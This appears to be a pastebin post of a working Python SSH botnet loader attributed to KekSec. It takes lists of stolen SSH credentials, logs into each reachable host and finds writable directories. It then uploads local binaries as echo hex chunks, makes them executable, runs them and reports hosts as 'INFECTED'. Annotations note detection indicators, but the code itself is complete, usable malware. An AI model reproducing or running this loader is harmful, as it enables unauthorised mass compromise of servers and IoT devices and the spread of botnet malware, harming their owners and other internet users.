KekSec

SSH ECHOLOADER FOR 2022 APRIL [ENJOY]

Apr 3rd, 2022 (edited)
  1. #!/usr/bin/python
  2. #Phaaaat hax SSH loader by Freak AKA Milenko
  3.  
  4. import sys, re, os, paramiko, socket, time
  5. from threading import Thread
  6. from time import sleep
  7.  
  8. if len(sys.argv) < 2:  # the only argument is the path to the input list
  9.     sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
  10.  
  11. paramiko.util.log_to_file("/dev/null")  # paramiko's own log is discarded, so no client-side log is kept
  12. rekdevice="payload" #command to send; the literal "payload" is what haxit() passes to exec_command on each host
  13. print "\033[31m"  # ANSI escape: switch terminal colour to red
  14.  
  15. print "S-S-SUUUPER fast SSH loader by Milenko"
  16. print
  17. #simply find and replace newlines to :: then a newline so every IP starts with ::. It will scan those for port 22 or whatever your skiddie heart desires </3
  18. print "Reads user:pass:ip and simply checks the IP for port 22."
  19. print "Then writes loads the bonet onto it and saves the logins with SSH running to \"sshopen.txt\""
  20. print "It is VERY fast and extremely efficient."
  21. print "As it splits the file into equal chunks for each thread!"
  22.  
  23. threads = int(raw_input("Threads: "))  # worker count is read interactively (Python 2 raw_input)
  24.  
  25. lines = open(sys.argv[1],"r").readlines()  # whole input list is read into memory; the handle is never closed
  26.  
  27. fh = open("sshopen.txt","a+")  # append-mode output file; check() writes each reachable login line to it in clear text
  28.  
  29. def chunkify(lst,n):  # split lst into n strided slices: slice i holds elements i, i+n, i+2n, ...
  30.     return [ lst[i::n] for i in xrange(n) ]  # xrange exists only in Python 2
  31.  
  32. running = 0  # incremented on entry to check() and decremented when it finishes
  33. global loaded
  34. loaded = 0  # incremented at the end of haxit()'s try body; printed by printStatus() and check()
  35.  
  36. def printStatus():  # status loop run in its own thread; never returns
  37.     while 1:
  38.         sleep(10)  # one status line every 10 seconds
  39.         print "\033[32m[\033[31m+\033[32m] Total eye pees loaded: " + str(loaded) + "\033[37m"
  40.         if loaded >= 1000:  # extra banner once the shared counter reaches 1000
  41.             print "Dayum u got sum phat hax brah :^}"
  42.  
  43. def split_utf8(s , n):  # generator: yield consecutive slices of s, each at most n long
  44.     assert n >= 4
  45.     start = 0
  46.     lens = len(s)
  47.     while start < lens:
  48.         if lens - start <= n:  # remainder fits in one slice: emit it and stop
  49.             yield s[start:]
  50.             return # StopIteration
  51.         end = start + n
  52.         while '\x80' <= s[end] <= '\xBF':  # back off while the next slice would start on a byte in 0x80-0xBF (UTF-8 continuation range)
  53.             end -= 1
  54.         assert end > start
  55.         yield s[start:end]
  56.         start = end
  57. def getfullOutput(stdout):  # collect everything readable from the stdout object returned by exec_command into one string
  58.     output = ""
  59.     for line in stdout.readlines():
  60.         output+=line+"\n"  # a newline is appended to every line read
  61.     return output
  62. def haxit(ip,username,password,normal):  # per-host routine; check() calls it with normal=-1, and it calls itself once with normal=4
  63.     global loaded
  64.     try:
  65.         final = 0  # set to 1 only on the normal == 4 pass, after a prompt character was seen
  66.         port = 22
  67.         ssh = paramiko.SSHClient()
  68.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # unknown host keys are accepted without verification
  69.         ssh.connect(ip, port = port, username=username, password=password, timeout=3)  # password authentication with a 3 s timeout
  70.         ssh.exec_command(rekdevice)  # first command after login is the module-level rekdevice string
  71.         if normal == 4:  # second pass only: look for a usable shell
  72.             for activate in ["enable", "system", "shell", "sh", "cat | sh"]:  # this fixed command sequence right after login is a server-side log pattern
  73.                 stdin, stdout, stderr = ssh.exec_command(activate)
  74.                 output = getfullOutput(stdout)
  75.                 if "$" in output or "#" in output:  # treats a '$' or '#' in the output as a shell prompt
  76.                     normal = 0
  77.                     break
  78.             if normal == 0:
  79.                 final = 1
  80. #        print "\033[32m[\033[31m+\033[32m] Echoloading: " + ip + "\033[37m"
  81.         stdin, stdout, stderr = ssh.exec_command("cd /tmp ; cd /home/$USER ; cd /var/run ; cd /mnt ; cd /root ; cd /")
  82.         getfullOutput(stdout)  # output is read and discarded
  83.         stdin, stdout, stderr = ssh.exec_command("cat /proc/mounts;busybox cat /proc/mounts")  # mount table is requested twice, via cat and via busybox cat
  84.         mounts = getfullOutput(stdout).split("\n")
  85.         for line in mounts:
  86.             try:
  87.                 path = line.split(" ")[1]  # second space-separated field of the mounts line is taken as the mount point
  88.                 if " rw" in line:  # only lines containing " rw" are considered
  89.                     stdin, stdout, stderr = ssh.exec_command("echo -e '%s' > %s/.keksec; cat %s/.keksec;/bin/busybox cat %s/.keksec; rm %s/.keksec||/binbusybox rm %s/.keksec\n" % ( ("\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, path, path, path, path)))  # write-test template: marker bytes \x41\x4b\x34\x37 ("AK47") into <mount>/.keksec, read back, delete; the .keksec filename is a host-side indicator
  90.                     if "AK47" in getfullOutput(stdout):
  91.                         print "\033[32m[\033[31m+\033[32m] Found writeable direcory: " + ip + ":" + path + "\033[37m"
  92.                         ssh.exec_command("cd %s" % path) #cd into the writeable directory
  93.             except:  # bare except: any error on a mounts line is swallowed and the loop moves on
  94.                 continue
  95.         stdin, stdout, stderr = ssh.exec_command("/bin/echo -e \"\\x41\\x4b\\x34\\x37\"")  # probe 1: does /bin/echo expand \xNN escapes to "AK47"?
  96.         if "AK47" in getfullOutput(stdout):
  97.             normal = 1
  98.         else:
  99.             stdin, stdout, stderr = ssh.exec_command("/bin/busybox echo -e \"\\x41\\x4b\\x34\\x37\"")  # probe 2: busybox echo
  100.             output = getfullOutput(stdout)
  101.             if "AK47" in output:
  102.                 normal = 2
  103.             else:
  104.                 stdin, stdout, stderr = ssh.exec_command("echo -e \"\\x41\\x4b\\x34\\x37\"")  # probe 3: echo resolved by the remote shell
  105.                 output = getfullOutput(stdout)
  106.                 if "AK47" in output:
  107.                     normal = 3
  108.                 else:
  109.                     if final:  # already on the second pass and still no working echo: give up on this host
  110.                         print "\033[32m[\033[31m+\033[32m] NO ECHO FOUND!!! -> " + ip + "\033[37m"
  111.                         return
  112.                     haxit(ip,username,password,4)  # retry the whole routine as the normal == 4 pass
  113.         for file in os.listdir("bins"):  # every entry of the local "bins" directory is transferred
  114.             f=open("bins/" + file,"rb")
  115.             for hex in split_utf8(f.read(), 128):  # file content is sent in slices of at most 128 bytes
  116.                 if normal == 1:
  117.                     ssh.exec_command("echo -ne " + ''.join(map(lambda c:'\\\\x%02x'%c, map(ord, hex))) + " >> " + file)  # each byte becomes a \xNN escape appended (>>) to a remote file of the same name; repeated "echo -ne \\x.. >> name" exec requests are the transfer signature
  118.                 if normal == 2:
  119.                     ssh.exec_command("/bin/busybox echo -ne " + ''.join(map(lambda c:'\\\\x%02x'%c, map(ord, hex))) + " >> " + file)  # same transfer through busybox echo
  120.                 if normal == 3:
  121.                     ssh.exec_command("echo -ne " + ''.join(map(lambda c:'\\\\x%02x'%c, map(ord, hex))) + " >> " + file)  # same command string as the normal == 1 branch
  122.             ssh.exec_command("chmod 777 " + file + "|| /bin/busybox chmod 777 " + file + "||/bin/chmod 777 " + file)  # world-writable/executable mode on the dropped file, with two fallbacks
  123.             stdin, stdout, stderr = ssh.exec_command("./" + file)  # the dropped file is executed by relative path
  124.             if "PERROR" in getfullOutput(stdout):  # the string "PERROR" in the program's stdout is taken as success
  125.                 print "\033[32m[\033[31m+\033[32m] INFECTED: " + ip + "\033[37m"
  126.         loaded += 1  # shared counter updated from many threads without a lock
  127.         ssh.close()
  128.     except Exception as e:  # any failure (connect, auth, command) ends the routine for this host
  129.         print str(e)
  130.         pass
  131.  
  132. def check(chunk, fh):  # worker thread body: TCP-probe port 22 for each entry of chunk, then hand reachable ones to haxit()
  133.     global running
  134.     running += 1
  135.     threadID = running  # ID is the counter value at start, so IDs can repeat once threads finish
  136.     for login in chunk:
  137.         if login.startswith("DUP"):
  138.             continue # skip DUPS cause fuck em
  139.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  140.         s.settimeout(3)
  141.         try:
  142.             s.connect((login.split(":")[0], 22))  # plain TCP connect to port 22; field 0 of the line is used as the host
  143.             s.close()
  144.             print "\033[32m[\033[31m+\033[32m] " + login + " has SSH open. Loading..."
  145.             haxit(login.split(":")[0], login.split(":")[1], login.split(":")[2], -1)  # fields 1 and 2 are passed as username and password
  146.             fh.write(login + "\r")  # the full login line, credentials included, is appended to sshopen.txt with a bare carriage return
  147.             fh.flush()
  148.         except:  # bare except: unreachable hosts and malformed lines are skipped silently
  149.             pass
  150.     print "\033[32m[\033[31m+\033[32m] Thread " + str(threadID) + " has finished scanning " + str(len(chunk)) + " IPs. Loaded: " + str(loaded)
  151.     running -= 1
  152.  
  153. lines = map(lambda s: s.strip(), lines) # remove all newlines
  154.  
  155. chunks = chunkify(lines, threads) # make seperate chunk for each thread
  156.  
  157. print "STARTING SCAN AND LOAD!!!"
  158.  
  159. Thread(target = printStatus, args = ()).start()  # status printer runs as a non-daemon thread
  160.  
  161. for thread in xrange(0,threads):  # one check() thread per chunk
  162.     if thread >= 384:  # from the 385th thread on, starts are spaced 0.2 s apart
  163.         time.sleep(0.2)
  164.     try:
  165.         Thread(target = check, args = (chunks[thread], fh,)).start()
  166.     except:  # a failed thread start is ignored
  167.         pass
  168. print "Scanning... Press enter 3 times to stop."
  169.  
  170. for i in range(0,3):  # block until Enter has been pressed three times
  171.     raw_input("")
  172.  
  173. fh.close()
  174.  
  175. os.kill(os.getpid(),9)  # the process sends signal 9 (SIGKILL) to itself, ending all threads at once
  176.  